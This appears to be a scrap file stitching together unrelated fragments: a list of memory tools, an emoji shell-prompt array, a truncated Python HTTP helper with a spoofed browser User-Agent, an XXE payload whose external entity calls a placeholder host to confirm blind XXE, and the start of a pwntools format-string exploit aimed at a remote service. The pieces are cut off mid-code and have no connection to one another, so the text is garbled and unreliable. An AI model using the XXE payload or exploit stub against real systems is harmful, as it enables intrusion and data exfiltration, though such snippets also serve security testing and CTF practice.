Required tools for playing around with memory:
hexdump
objdump
readelf
xxd
gcore
# emojiparty: a blend of random-emoji and terminalparty
PROMPT_EMOJI=(🐶 🐱 🐭 🐹 🐰 🐻 🐼 🐨 🐯 🦁 🐮 🐷 🐽 🐵 🙈 🙉 🙊 🐒 🐔 🐧 \
🐦 🐤 🐣 🐥 🐺 🐗 🐴 🦄 🐝 🐛 🐌 🐜 🕷 🦂 🐠 🐟 🐡 🐬 🐳 🐋 🐆 🐅 🐃 🐂 \
🐄 🐪 🐫 🐘 🐐 🐏 🐑 🐎 🐖 🐀 🐁 🐓 🦃 🕊 🐕 🐩 🐈 🐇 🐿 🎋 🍂 🌾 🌺 \
🌻 🌷 🌼 🌸 💐 🌰 🎃 🐚 🕸 🚕 🚙 🚌 🚎 🚓 🚑 🚐 🚚 🚜 🏍 🚲 🚔 🚍 🚘 🚖 \
🚡 🚟 🚃 🚋 🚅 🚈 🚞 🚆 🚇 🚊 🚉 🚁 🛩 🛫 🛬 ⛵️ 🛥 🚤 ⛴ 🛳 🚀 🛰 💺 🚧 \
😀 😬 😁 😃 😄 😅 😆 😇 😉 😊 🙂 🙃 😋 😌 😍 😘 😗 😙 😚 😜 😝 😛 🤑 🤓 \
😎 🤗 😏 😶 😐 😑 😒 🙄 🤔 😳 😞 😟 😠 😔 😕 🙁 😣 😖 😯 😦 😧 😵 😲 🤐 \
😷 🤒 🤕 😴 💤 💀 👽 🤖 😺 😸 😻 😼 😽 😾 ⚽️ 🏀 🏈 🏐 🏉 🎱 🏌 🏸 🏒 🏑 \

#!/usr/bin/env python3
import requests

client = requests.Session()
debug = False

def post(url, data, headers=None, proxy=False):
    if not headers:
        headers = {}
    headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

from pwn import *
from libformatstr import *
file = ELF("./32_new")
flag = 0x0804870b
r = remote("163.172.176.29",9035)
r.recvuntil("name?")